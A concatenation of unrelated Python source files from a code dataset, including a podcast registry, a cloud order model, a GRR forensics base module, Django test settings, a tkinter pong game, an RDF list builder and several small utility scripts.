        rss="https://www.podcastinit.com/feed/mp3/",
        rss_parser=BaseItem,
    ),
    Podcast(
        name="indiehackers",
        title="Indie Hackers",
        url="https://www.indiehackers.com/podcast",
        rss="http://feeds.backtracks.fm/feeds/indiehackers/indiehackers/feed.xml",
        rss_parser=IndieHackersItem,
    ),
    Podcast(
        name="realpython",
        title="Real Python",
        url="https://realpython.com/podcasts/rpp/",
        rss="https://realpython.com/podcasts/rpp/feed",
        rss_parser=BaseItem,
    ),
    Podcast(
        name="kubernetespodcast",
        title="Kubernetes Podcast",
        url="https://kubernetespodcast.com/",
        rss="https://kubernetespodcast.com/feeds/audio.xml",
        rss_parser=BaseItem,
    ),
]

# Fast lookup by short name.
PODCAST_MAP = {p.name: p for p in PODCASTS}
| StarcoderdataPython |
1623265 | <gh_stars>10-100
# coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
class OrderSpec(object):
    """Anti-DDoS protection-package order specification (JD Cloud, generated model)."""

    def __init__(self, buyType, pkgType, ipNum, bp, ep, returnUrl, id=None, name=None, timeSpan=None, timeUnit=None):
        """
        :param buyType: operation type; 1: buy a new protection package, 3: upgrade an existing one
        :param id: (Optional) protection-package instance id; required when upgrading
        :param name: (Optional) instance name; required for a new purchase.
            1-80 characters; may contain Chinese characters, letters, digits, -, ., /, _
        :param pkgType: package type; 1: dedicated IP, 2: shared IP
        :param ipNum: number of IPs that can be protected: 5, 10, 50, 100, 1000 (unlimited)
        :param bp: guaranteed bandwidth: 10, 20, 30, 50, unit: Gbps
        :param ep: elastic bandwidth: 0, 10, 20, unit: Gbps
        :param timeSpan: (Optional) purchase duration; required for a new purchase.
            - 1-9 when timeUnit is 3
            - 1-3 when timeUnit is 4
        :param timeUnit: (Optional) duration unit; required for a new purchase.
            - 3: months
            - 4: years
        :param returnUrl: callback url
        """
        self.buyType = buyType
        self.id = id
        self.name = name
        self.pkgType = pkgType
        self.ipNum = ipNum
        self.bp = bp
        self.ep = ep
        self.timeSpan = timeSpan
        self.timeUnit = timeUnit
        self.returnUrl = returnUrl
| StarcoderdataPython |
1609557 | <filename>hello.py
from helper import greeting

greeting("hello")  # emit a greeting via the helper module
2215 | <reponame>RonaldoAPSD/Hedge
import Hedge

# Minimal REPL: read a line, run it through the Hedge interpreter, then
# print either the error or the result (unwrapped when it is a single element).
while True:
    text = input('Hedge > ')
    if text.strip() == "":
        continue  # ignore blank input
    result, error = Hedge.run('<stdin>', text)
    if (error):
        print(error.asString())
    elif result:
        if len(result.elements) == 1:
            print(repr(result.elements[0]))
        else:
            print(repr(result))
3349812 | <reponame>hkhalifa/dftimewolf
"""Base GRR module class. GRR modules should extend it."""
from logging import Logger
import tempfile
import time
from typing import Optional, Union, Callable, List, Any
from grr_api_client import api as grr_api
from grr_api_client import errors as grr_errors
from grr_api_client.client import Client
from grr_api_client.flow import Flow
from grr_api_client.hunt import Hunt
from dftimewolf.lib.errors import DFTimewolfError
class GRRBaseModule(object):
  """Base module for GRR hunt and flow modules.
  Attributes:
    output_path (str): path to store collected artifacts.
    grr_api: GRR HTTP API client.
    grr_url: GRR HTTP URL.
    reason (str): justification for GRR access.
    approvers: list of GRR approval recipients.
  """
  # Seconds to sleep between polls while waiting for an approval to be granted.
  _CHECK_APPROVAL_INTERVAL_SEC = 10
  def __init__(self) -> None:
    """Initializes an unconfigured GRR hunt or flow module.
    Only creates empty attribute slots; the actual configuration is applied
    later by GrrSetUp().
    """
    self.reason = str()
    self.grr_api = None  # type: grr_api.ApiClient
    self.grr_url = str()
    self.approvers = []  # type: List[str]
    self.output_path = str()
  # pylint: disable=arguments-differ
  def GrrSetUp(
      self,
      reason: str,
      grr_server_url: str,
      grr_username: str,
      grr_password: str,
      approvers: Optional[str]=None,
      verify: bool=True) -> None:
    """Initializes a GRR hunt result collector.
    Args:
      reason (str): justification for GRR access.
      grr_server_url (str): GRR server URL.
      grr_username (str): GRR username.
      grr_password (str): GRR password.
      approvers (Optional[str]): comma-separated GRR approval recipients.
      verify (Optional[bool]): True to indicate GRR server's x509 certificate
          should be verified.
    """
    grr_auth = (grr_username, grr_password)
    if approvers:
      self.approvers = [item.strip() for item in approvers.split(',')]
    self.grr_api = grr_api.InitHttp(api_endpoint=grr_server_url,
                                    auth=grr_auth,
                                    verify=verify)
    self.grr_url = grr_server_url
    # Collected artifacts are written to a fresh temporary directory.
    self.output_path = tempfile.mkdtemp()
    self.reason = reason
  # TODO: change object to more specific GRR type information.
  def _WrapGRRRequestWithApproval(
      self,
      grr_object: Union[Hunt, Client],
      grr_function: Callable, # type: ignore[type-arg]
      logger: Logger,
      *args: Any,
      **kwargs: Any
  ) -> Union[Flow, Hunt]:
    """Wraps a GRR request with approval.
    This method will request the approval if not yet granted.
    Args:
      grr_object (object): GRR object to create the eventual approval on.
      grr_function (function): GRR function requiring approval.
      args (list[object]): Positional arguments that are to be passed
          to `grr_function`.
      kwargs (dict[str, object]): keyword arguments that are to be passed
          to `grr_function`.
    Returns:
      object: return value of the execution of grr_function(*args, **kwargs).
    Raises:
      DFTimewolfError: If approvers are required but none were specified.
    """
    approval_sent = False
    approval_url = None
    # Poll until the call succeeds; AccessForbiddenError means an approval
    # is (still) missing.
    while True:
      try:
        return grr_function(*args, **kwargs)
      except grr_errors.AccessForbiddenError as exception:
        logger.info('No valid approval found: {0!s}'.format(exception))
        # If approval was already sent, just wait a bit more.
        if approval_sent:
          logger.info('Approval not yet granted, waiting {0:d}s'.format(
              self._CHECK_APPROVAL_INTERVAL_SEC))
          logger.info(approval_url)
          time.sleep(self._CHECK_APPROVAL_INTERVAL_SEC)
          continue
        # If no approvers were specified, abort.
        if not self.approvers:
          message = ('GRR needs approval but no approvers specified '
                     '(hint: use --approvers)')
          raise DFTimewolfError(message, critical=True) from exception
        # Otherwise, send a request for approval
        approval = grr_object.CreateApproval(
            reason=self.reason, notified_users=self.approvers)
        approval_sent = True
        # NOTE(review): this URL uses client-approval fields even when
        # 'grr_object' is a Hunt — confirm that hunt approvals expose
        # 'client_id'/'approval_id' the same way.
        approval_url = ('{0:s}/#/users/{1:s}/approvals/client/{2:s}/{3:s}'.
                        format(self.grr_url, approval.username,
                               approval.client_id,
                               approval.approval_id))
        logger.info(
            '{0!s}: approval request sent to: {1!s} (reason: {2:s})'.format(
                grr_object, self.approvers, self.reason))
| StarcoderdataPython |
3396365 | class Foo:
def __rad<caret>
| StarcoderdataPython |
3379672 | <reponame>trevoriancox/django-google-analytics
# Minimal Django settings used to exercise the google_analytics app.
SECRET_KEY = 'foo'
# SQLite backend with no NAME configured — suitable only for tests.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3'
    }
}
# Core Django apps plus the app under test.
INSTALLED_APPS = (
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sites',
    'django.contrib.sessions',
    'google_analytics',
)
TEMPLATE_CONTEXT_PROCESSORS = (
    "django.contrib.auth.context_processors.auth",
    "django.core.context_processors.debug",
    "django.core.context_processors.i18n",
    "django.core.context_processors.media",
    "django.core.context_processors.static",
    "django.core.context_processors.tz",
    "django.contrib.messages.context_processors.messages",
    "django.core.context_processors.request",
)
STATIC_URL = ''
SITE_ID = 1
# Tracker id consumed by the google_analytics app; dummy value for tests.
GOOGLE_ANALYTICS = {
    'google_analytics_id': 'ua-test-id',
}
ROOT_URLCONF = 'google_analytics.urls'
| StarcoderdataPython |
1726779 | #!/usr/bin/env python
# NOTE(review): this file uses Python 2 'print' statements and will not run
# under Python 3.
CONST = 3.14
if __name__ == '__main__':
    # 'Excecuting' is a typo ('Executing') in the runtime output; left
    # unchanged here because it is program output, not a comment.
    print 'Excecuting as a script'
    print 'End of %s' % (__file__)
| StarcoderdataPython |
119903 | <filename>fiat/stages.py
"""
base:
<NAME> <<EMAIL>>
Copyright 2020-2021, <NAME>
License: Apache-2.0 (https://www.apache.org/licenses/LICENSE-2.0)
Contents:
"""
from __future__ import annotations
import collections.abc
import copy
import dataclasses
import itertools
from types import ModuleType
from typing import (Any, Callable, ClassVar, Dict, Hashable, Iterable, List,
Mapping, MutableMapping, MutableSequence, Optional,
Sequence, Set, Tuple, Type, Union)
import denovo
import more_itertools
import fiat
@dataclasses.dataclass
class Section(denovo.quirks.Factory, denovo.containers.Lexicon):
    """Section of an Outline, with node connections parsed from settings.
    Args:
        contents (Dict[str, Any]): stored dictionary. Defaults to an empty
            dict.
        default_factory (Any): default value to return when the 'get' method
            is used. Defaults to None.
        name (str): name of the settings section this instance mirrors.
    """
    contents: Dict[str, Any] = dataclasses.field(default_factory = dict)
    default_factory: Any = None
    name: str = None
    sources: ClassVar[Mapping[Type, str]] = {
        fiat.shared.bases.settings : 'settings'}
    """ Properties """
    @property
    def bases(self) -> Dict[str, str]:
        """Maps each connected node name to its base type name."""
        return self._get_bases()
    @property
    def connections(self) -> Dict[str, List[str]]:
        """Maps node names to the list of nodes they connect to."""
        return self._get_connections()
    @property
    def designs(self) -> Dict[str, str]:
        """Maps node names to their declared design ('<name>_design' keys)."""
        return self._get_designs()
    @property
    def nodes(self) -> List[str]:
        """Returns all unique node names appearing in 'connections'."""
        key_nodes = list(self.connections.keys())
        value_nodes = list(
            itertools.chain.from_iterable(self.connections.values()))
        return denovo.tools.deduplicate(item = key_nodes + value_nodes)
    @property
    def other(self) -> Dict[str, str]:
        """Returns entries that are neither connections nor designs."""
        return self._get_other()
    @property
    def suffixes(self) -> List[str]:
        """Returns the key suffixes recognized as connection declarations."""
        return denovo.shared.library.subclasses.suffixes
    """ Public Methods """
    @classmethod
    def from_settings(cls,
                      settings: fiat.shared.bases.settings,
                      name: str,
                      **kwargs) -> Section:
        """Creates a Section mirroring one named section of 'settings'.
        Args:
            settings (fiat.shared.bases.settings): loaded project settings.
            name (str): name of the section in 'settings' to mirror.
        Returns:
            Section: derived from 'settings'.
        """
        return cls(contents = settings[name], name = name, **kwargs)
    """ Private Methods """
    def _get_bases(self) -> Dict[str, str]:
        """Returns a dict mapping connected node names to base type names."""
        bases = {}
        for key in self.connections.keys():
            prefix, suffix = denovo.tools.divide_string(key)
            values = denovo.tools.listify(self[key])
            # Plural suffixes ('workers') are singularized to the base name.
            if suffix.endswith('s'):
                base = suffix[:-1]
            else:
                base = suffix
            bases.update(dict.fromkeys(values, base))
        return bases
    def _get_connections(self) -> Dict[str, List[str]]:
        """Returns a dict mapping node names to their connected nodes.
        Keys whose prefix equals their suffix describe this section itself
        and are filed under 'self.name'.
        """
        connections = {}
        keys = [k for k in self.keys() if k.endswith(self.suffixes)]
        for key in keys:
            prefix, suffix = denovo.tools.divide_string(key)
            values = denovo.tools.listify(self[key])
            if prefix == suffix:
                # Bug fix: membership must be tested on 'self.name' (the key
                # written below), not on 'prefix' — the old check raised
                # KeyError whenever 'prefix' was present but 'self.name'
                # was not.
                if self.name in connections:
                    connections[self.name].extend(values)
                else:
                    connections[self.name] = values
            else:
                if prefix in connections:
                    connections[prefix].extend(values)
                else:
                    connections[prefix] = values
        return connections
    def _get_designs(self) -> Dict[str, str]:
        """Returns a dict mapping node names to design names."""
        designs = {}
        design_keys = [k for k in self.keys() if k.endswith('_design')]
        for key in design_keys:
            prefix, suffix = denovo.tools.divide_string(key)
            designs[prefix] = self[key]
        return designs
    def _get_other(self) -> Dict[str, str]:
        """Returns entries that are neither design nor connection keys."""
        design_keys = [k for k in self.keys() if k.endswith('_design')]
        connection_keys = [k for k in self.keys() if k.endswith(self.suffixes)]
        exclude = design_keys + connection_keys
        return {k: v for k, v in self.contents.items() if k not in exclude}
@dataclasses.dataclass
class Outline(denovo.quirks.Factory, denovo.containers.Lexicon):
    """Organized fiat project settings with convenient accessors.
    Args:
        contents (MutableMapping[str, Section]): mapping of section names to
            Section instances. Defaults to an empty dict.
        default_factory (Any): default value to return when the 'get' method
            is used. Defaults to None.
    """
    contents: MutableMapping[str, Section] = dataclasses.field(
        default_factory = dict)
    default_factory: Any = None
    sources: ClassVar[Mapping[Type, str]] = {
        fiat.shared.bases.settings : 'settings'}
    """ Properties """
    @property
    def bases(self) -> Dict[str, str]:
        """Maps node names to base type names, aggregated over all sections."""
        return self._get_bases()
    @property
    def connections(self) -> Dict[str, List[str]]:
        """Maps node names to connected nodes, aggregated over all sections."""
        return self._get_connections()
    @property
    def designs(self) -> Dict[str, str]:
        """Maps node names to design names, aggregated over all sections."""
        return self._get_designs()
    @property
    def initialization(self) -> Dict[str, Any]:
        """Maps node names to their initialization parameters."""
        return self._get_initialization()
    @property
    def nodes(self) -> List[str]:
        """Returns all unique node names appearing in 'connections'."""
        key_nodes = list(self.connections.keys())
        value_nodes = list(
            itertools.chain.from_iterable(self.connections.values()))
        return denovo.tools.deduplicate(item = key_nodes + value_nodes)
    @property
    def other(self) -> Dict[str, Any]:
        """Returns non-connection, non-design entries from all sections."""
        return self._get_other()
    """ Public Methods """
    @classmethod
    def from_settings(cls,
                      settings: fiat.shared.bases.settings,
                      **kwargs) -> Outline:
        """Creates an Outline from loaded project 'settings'.
        Args:
            settings (fiat.shared.bases.settings): loaded project settings.
        Returns:
            Outline: derived from 'settings'.
        """
        return fiat.workshop.settings_to_outline(settings = settings, **kwargs)
    """ Private Methods """
    def _get_bases(self) -> Dict[str, str]:
        """Returns base type names for every known node."""
        # Every node defaults to being its own base; sections then override.
        bases = dict(zip(self.nodes, self.nodes))
        for section in self.values():
            bases.update(section.bases)
        return bases
    def _get_connections(self) -> Dict[str, List[str]]:
        """Merges the 'connections' mappings of all stored sections."""
        connections = {}
        for section in self.values():
            for key, links in section.connections.items():
                if key in connections:
                    connections[key].extend(links)
                else:
                    connections[key] = links
        return connections
    def _get_designs(self) -> Dict[str, str]:
        """Merges the 'designs' mappings of all stored sections."""
        designs = {}
        for section in self.values():
            designs.update(section.designs)
        return designs
    def _get_initialization(self) -> Dict[str, Dict[str, Any]]:
        """Collects '<name>_parameters' entries keyed by node name."""
        initialization = collections.defaultdict(dict)
        # Bug fix: the original iterated 'self.keys' (the bound method
        # object, a TypeError) and built a list of booleans via
        # 'k.endswith(...)'; filter the actual key names instead.
        keys = [k for k in self.keys() if k.endswith('_parameters')]
        for key in keys:
            prefix, _ = denovo.tools.divide_string(key)
            initialization[prefix] = self[key]
        return initialization
    def _get_other(self) -> Dict[str, str]:
        """Merges the 'other' mappings of all stored sections."""
        other = {}
        for section in self.values():
            other.update(section.other)
        return other
@dataclasses.dataclass
class Workflow(denovo.structures.System):
    """Project workflow implementation as a directed acyclic graph (DAG).
    Workflow stores its graph as an adjacency list. Despite being called an
    "adjacency list," the typical and most efficient way to create one in python
    is using a dict. The keys of the dict are the nodes and the values are sets
    of the hashable summaries of other nodes.
    Workflow internally supports autovivification where a set is created as a
    value for a missing key.
    Args:
        contents (Adjacency): an adjacency list where the keys are nodes and the
            values are sets of hash keys of the nodes which the keys are
            connected to. Defaults to an empty defaultdict of sets.
    """
    contents: denovo.structures.Adjacency = dataclasses.field(
        default_factory = lambda: collections.defaultdict(set))
    """ Properties """
    @property
    def cookbook(self) -> fiat.base.Cookbook:
        """Returns the stored workflow as a Cookbook of Recipes."""
        return fiat.workshop.workflow_to_cookbook(source = self)
    """ Dunder Methods """
    def __str__(self) -> str:
        """Returns prettier summary of the stored graph.
        Returns:
            str: a formatted str of class information and the contained
                adjacency list.
        """
        return denovo.tools.beautify(item = self, package = 'fiat')
| StarcoderdataPython |
35326 | import socket
# Connection target; filled in by address() before connector() runs.
HOST = ""
PORT = ""
def address():
    """Prompt the user for the target IP and port, then start the client."""
    global HOST, PORT
    print("What is the IP of the computer you want to connect to? ")
    HOST = input(":")
    print("What is the PORT of the computer you want to connect to? ")
    PORT = int(input(":"))
    connector()
def connector():
    """Open a TCP connection to (HOST, PORT), send a probe, print the reply."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as conn:
        conn.connect((HOST, PORT))
        conn.sendall(b"test")
        data = conn.recv(1024)
        print(f"Received {data!r}")
# Entry point: prompt for a target, then connect.
address()
| StarcoderdataPython |
194215 | <filename>Cap02/Lab01/game_v1.py
# Game Ping-Pong
from tkinter import * # wildcard import brings in Tk, Canvas, etc.
import random
import time
level = int(input("Qual nível você gostaria de jogar? 1/2/3/4/5 \n")) # difficulty chosen by the player
length = 500/level # paddle width shrinks as the level rises
root = Tk() # main application window
root.title("Ping Pong") # window title
root.resizable(0,0) # fixed-size window
root.wm_attributes("-topmost", -1) # window stacking hint
canvas = Canvas(root, width=800, height=600, bd=0,highlightthickness=0) # playing field
canvas.pack() # lay out the canvas
root.update() # force geometry to be computed before the game starts
# The code up to this point creates the window where the game takes place.
# Global game state shared by the classes and callbacks below.
count = 0
lost = False
class Bola: # ball: holds the ball's configuration and movement
    def __init__(self, canvas, Barra, color):
        """Create the ball on 'canvas' with a random initial horizontal speed."""
        self.canvas = canvas
        self.Barra = Barra
        self.id = canvas.create_oval(0, 0, 15, 15, fill=color)
        self.canvas.move(self.id, 245, 200)
        starts_x = [-3, -2, -1, 1, 2, 3] # candidate horizontal speeds
        random.shuffle(starts_x) # randomize so each game starts differently
        self.x = starts_x[0]
        self.y = -3
        self.canvas_height = self.canvas.winfo_height()
        self.canvas_width = self.canvas.winfo_width()
    def draw(self):
        """Advance the ball one tick, bouncing off walls and the paddle."""
        self.canvas.move(self.id, self.x, self.y)
        pos = self.canvas.coords(self.id)
        if pos[1] <= 0: # top edge: bounce downwards
            self.y = 3
        if pos[3] >= self.canvas_height: # bottom edge: bounce upwards
            self.y = -3
        if pos[0] <= 0: # left edge
            self.x = 3
        if pos[2] >= self.canvas_width: # right edge
            self.x = -3
        self.Barra_pos = self.canvas.coords(self.Barra.id)
        if pos[2] >= self.Barra_pos[0] and pos[0] <= self.Barra_pos[2]: # horizontal overlap with the paddle
            if pos[3] >= self.Barra_pos[1] and pos[3] <= self.Barra_pos[3]: # vertical overlap: a hit, score a point
                self.y = -3
                global count
                count +=1
                score()
        # NOTE(review): the bottom-edge check above bounces the ball back up,
        # which appears to make the game-over branch below unreachable —
        # confirm whether losing was meant to trigger at the paddle line.
        if pos[3] <= self.canvas_height: # ball still in play: schedule next tick
            self.canvas.after(10, self.draw)
        else:
            game_over()
            global lost
            lost = True
class Barra: # paddle: holds the paddle's configuration and keyboard movement
    def __init__(self, canvas, color):
        """Create the paddle on 'canvas' and bind the arrow-key handlers."""
        self.canvas = canvas
        self.id = canvas.create_rectangle(0, 0, length, 10, fill=color)
        self.canvas.move(self.id, 200, 400)
        self.x = 0
        self.canvas_width = self.canvas.winfo_width()
        self.canvas.bind_all("<KeyPress-Left>", self.move_left)
        self.canvas.bind_all("<KeyPress-Right>", self.move_right)
    def draw(self):
        """Advance the paddle one tick and re-schedule while the game is live."""
        self.canvas.move(self.id, self.x, 0)
        self.pos = self.canvas.coords(self.id)
        if self.pos[0] <= 0: # stop at the left edge
            self.x = 0
        if self.pos[2] >= self.canvas_width: # stop at the right edge
            self.x = 0
        global lost
        if lost == False:
            self.canvas.after(10, self.draw)
    def move_left(self, event):
        """Arrow-key handler: start moving left unless already at the edge."""
        if self.pos[0] >= 0:
            self.x = -3
    def move_right(self, event):
        """Arrow-key handler: start moving right unless already at the edge."""
        if self.pos[2] <= self.canvas_width:
            self.x = 3
def start_game(event):
    """Mouse-click handler: reset score/state and start both game loops."""
    global lost, count
    lost = False
    count = 0
    score()
    canvas.itemconfig(game, text=" ")
    time.sleep(1)
    Barra.draw()
    Bola.draw()
def score():
    """Refresh the on-canvas score display."""
    canvas.itemconfig(score_now, text="Pontos: " + str(count))
def game_over():
    """Show the game-over message."""
    canvas.itemconfig(game, text="Game over!")
# NOTE: these assignments rebind the class names to instances, shadowing the
# classes; this works only because no further instances are ever created.
Barra = Barra(canvas, "orange") # sets the paddle color
Bola = Bola(canvas, Barra, "purple") # sets the ball color
score_now = canvas.create_text(430, 20, text="Pontos: " + str(count), fill = "green", font=("Arial", 16))
game = canvas.create_text(400, 300, text=" ", fill="red", font=("Arial", 40))
canvas.bind_all("<Button-1>", start_game)
root.mainloop()
| StarcoderdataPython |
169297 | <filename>ws/RLAgents/E_SelfPlay/play/greedy_player_mgt.py
def greedy_player_mgt(game_mgr):
    """Build a greedy player for *game_mgr*.

    Returns:
        fn_get_action(pieces): returns the action (int index) with the best
        immediate score from player 1's perspective, or None when the game
        manager reports no valid moves (or none of them is legal).
    """
    def fn_get_action(pieces):
        valid_moves = game_mgr.fn_get_valid_moves(pieces, 1)
        if valid_moves is None:
            return None
        candidates = []
        for action in range(game_mgr.fn_get_action_size()):
            if valid_moves[action] == 0:
                continue  # skip illegal moves
            next_pieces = game_mgr.fn_get_next_state(pieces, 1, action)
            score = game_mgr.fn_get_score(next_pieces, 1)
            # Negate the score so min() picks the highest score; ties break
            # on the lowest action index, matching sort() + [0] semantics.
            candidates.append((-score, action))
        # Guard against an all-zero valid-move mask (was an IndexError).
        if not candidates:
            return None
        return min(candidates)[1]
    return fn_get_action
1761341 | <gh_stars>0
from os import environ
import argparse
from infcommon import logger
from infrabbitmq import factory as infrabbitmq_factory
def main(destination_exchange, broker_uri, event_name, network, data):
    """Publish a single event to 'destination_exchange' on the given broker."""
    infrabbitmq_factory.configure_pika_logger_to_error()
    event_publisher = infrabbitmq_factory.rabbitmq_event_publisher(exchange=destination_exchange, broker_uri=broker_uri)
    event_publisher.publish(event_name=event_name, network=network, data=data)
if __name__ == '__main__':
    try:
        parser = argparse.ArgumentParser()
        parser.add_argument('-d', '--destination_exchange', action='store', default='events', help='Default exchange is events')
        parser.add_argument('-e', '--event_name', action='store', required=True, help='')
        parser.add_argument('-n', '--network', action='store', required=True, help='Network name (ilo, c2k, ...)')
        parser.add_argument('-o', '--operations', action='store_true', default=False, help='Publish to operations broker')
        parser.add_argument('data')
        args = parser.parse_args()
        # Broker URI comes from the environment; '-o' selects the operations
        # broker instead of the default one.
        if args.operations:
            broker_uri = environ['OPERATIONS_BROKER_URI']
        else:
            broker_uri = environ['BROKER_URI']
        main(destination_exchange=args.destination_exchange, broker_uri=broker_uri, event_name=args.event_name, network=args.network, data=args.data)
    except Exception as exc:
        # Any failure (including KeyError for missing env vars) is logged as
        # critical with the traceback.
        logger.critical(f'EventPublisher Fails. exc_type: {type(exc)} exc: {exc}',
                        exc_info=True)
| StarcoderdataPython |
1792165 | <filename>config.py
# Trait-layer configuration for the image generator. Each entry describes one
# layer, composited in 'id' order (1 is the bottom-most layer):
#   id             - composite order of the layer
#   name           - human-readable layer name
#   directory      - folder containing this layer's trait images
#   required       - whether every generated image must include this layer
#   rarity_weights - optional per-trait weights; None means uniform rarity
CONFIG = [
    {
        'id': 1,
        'name': 'Background',
        'directory': 'Background',
        'required': True,
        'rarity_weights': None,
    },
    {
        'id': 2,
        'name': 'Dinos',
        'directory': 'Dinos',
        'required': True,
        'rarity_weights': None,
    },
    {
        'id': 3,
        'name': 'Accessories',
        'directory': 'Accessories',
        'required': True,
        'rarity_weights': None,
    }
]
| StarcoderdataPython |
3230496 | <reponame>houzw/knowledge-base-data
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: houzhiwei
# time: 2019/9/25 9:19
from owlready2 import *
# Build a small RDF/RDFS vocabulary (Resource, Literal, rdf:List with
# first/rest) inside a test ontology, then link Python strings into an
# RDF linked list.
test_ont = get_ontology('http://www.test.org#')
rdf = get_ontology('http://www.w3.org/1999/02/22-rdf-syntax-ns#')
rdfs = get_ontology('http://www.w3.org/2000/01/rdf-schema#')
with test_ont:
	class Resource(Thing):
		namespace = rdfs
		isDefinedBy = 'http://www.w3.org/2000/01/rdf-schema#'
		label = "Resource"
		comment = "The class resource, everything."
	class Literal(Resource):
		namespace = rdfs
		isDefinedBy = 'http://www.w3.org/2000/01/rdf-schema#'
		label = "Literal"
		comment = "The class of literal values, eg. textual strings and integers."
	class List(Resource):
		isDefinedBy = 'http://www.w3.org/1999/02/22-rdf-syntax-ns#'
		namespace = rdf
		label = "List"
		comment = "The class of RDF Lists."
	class first(ObjectProperty):
		isDefinedBy = 'http://www.w3.org/1999/02/22-rdf-syntax-ns#'
		namespace = rdf
		label = "first"
		comment = "The first item in the subject RDF list."
		domain = [List]
		range = [Resource]
	class rest(ObjectProperty):
		isDefinedBy = 'http://www.w3.org/1999/02/22-rdf-syntax-ns#'
		namespace = rdf
		label = "rest"
		comment = "The rest of the subject RDF list after the first item."
		domain = [List]
		range = [List]
# rdf:nil — the canonical empty-list terminator.
nil = List('nil', label='nil', comment='The empty list, with no items in it. If the rest of a list is nil then the list has no more items in it.', namespace=test_ont)
print(Resource)
l = ['a', 'b', 'c', 'd']
testl = List(0, namespace=test_ont)
print(nil)
def create_list(rdf_list, words):
	# Recursively fill 'rdf_list' with 'words': each cell's 'first' holds one
	# word as a Literal; the last cell's 'rest' points at nil.
	rdf_list.first = [Literal(words[0], namespace=test_ont)]
	if len(words) == 1:
		rdf_list.rest.append(nil)
		return rdf_list
	_rdf_list = List(0, namespace=test_ont)
	rdf_list.rest.append(create_list(_rdf_list, words[1:]))
	return rdf_list
create_list(testl, l)
print(testl)
print(testl.first)
print(testl.rest)
# test_ont.save("list_test.owl")
| StarcoderdataPython |
3214496 | <gh_stars>1-10
from PySide2 import QtCore
from PySide2.QtWidgets import QSlider
class UISliderWidget(QSlider):
    '''Horizontal slider that mirrors its (optionally scaled) value into a QLabel.

    The slider stores integers; 'scale_factor' lets callers display a scaled
    (possibly non-integer) value without subclassing QSlider further.
    '''
    def __init__(self, label, scale_factor=1):
        QSlider.__init__(self)
        self.label = label
        self.scale_factor = scale_factor
        self.setOrientation(QtCore.Qt.Horizontal)
        self.setFocusPolicy(QtCore.Qt.StrongFocus)
        self.setTickPosition(QSlider.TicksBelow)
        # Keep the label in sync whenever the slider value changes.
        self.valueChanged.connect(self.show_slider_value)
    def get_slider_value(self):
        '''Return the slider's current value multiplied by scale_factor.'''
        return self.value()*self.scale_factor
    def show_slider_value(self):
        '''Slot: write the (scaled) slider value into the associated label.'''
        value = self.get_slider_value()
        self.label.setText(str(value))
4814256 | import copy
import jsonpickle
import sys
import getopt
import BingoBoard
import ChoicePool
# Command-line options:
#   -e <file>  read choices from an Excel spreadsheet (column 'Bingo Choices')
#   -y <file>  read choices from a YAML file (top-level key 'choices')
#   -o <file>  JSON output path (default: output.json)
opts = getopt.getopt(sys.argv[1:], 'e:y:o:')
excel = False
file = ""
outputFile = 'output.json'
for o, a in opts[0]:
    if o == '-e':
        excel = True
        file = a
    elif o == '-y':
        excel = False
        file = a
    elif o == '-o':
        # Bug fix: validate the user-supplied value ('a'), not the current
        # value of 'outputFile' — the old check tested the default (which
        # always ends in '.json') and so never fired.
        if not a.endswith(".json"):
            raise ValueError("Output file must end with .json, currently only json is supported.")
        outputFile = a
if file == "":
    raise ValueError("You must specify an input file.")
# Load the choice list from the selected input format.
if excel:
    import pandas
    dataframe: pandas.DataFrame = pandas.read_excel(io=file)
    choices = dataframe['Bingo Choices'].tolist()
else:
    import yaml
    from yaml import BaseLoader
    with open(file, "r") as f:
        yamlInput = f.read()
    yamlOutput = yaml.load(yamlInput, Loader=BaseLoader)
    choices = yamlOutput['choices']
# Build the board from the choice pool and serialize it as JSON.
choice_pool = ChoicePool.ChoicePool(choices)
bingo_board = BingoBoard.BingoBoard(choice_pool)
# Use a distinct name for the output handle instead of reusing 'file'.
with open(outputFile, 'w') as out_file:
    out_file.write(jsonpickle.encode(bingo_board.getBoard()))
| StarcoderdataPython |
3234386 | <gh_stars>1-10
#!/usr/bin/env python3
# specs.py
# https://github.com/Jelmerro/stagger
#
# Copyright (c) 2022-2022 <NAME>
# Copyright (c) 2009-2011 <NAME> <<EMAIL>>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import unittest
import warnings
from stagger.errors import Warning, FrameError
from stagger.frames import TextFrame
from stagger.specs import ByteSpec, IntegerSpec, SignedIntegerSpec, VarIntSpec
from stagger.specs import RVADIntegerSpec, BinaryDataSpec, SimpleStringSpec
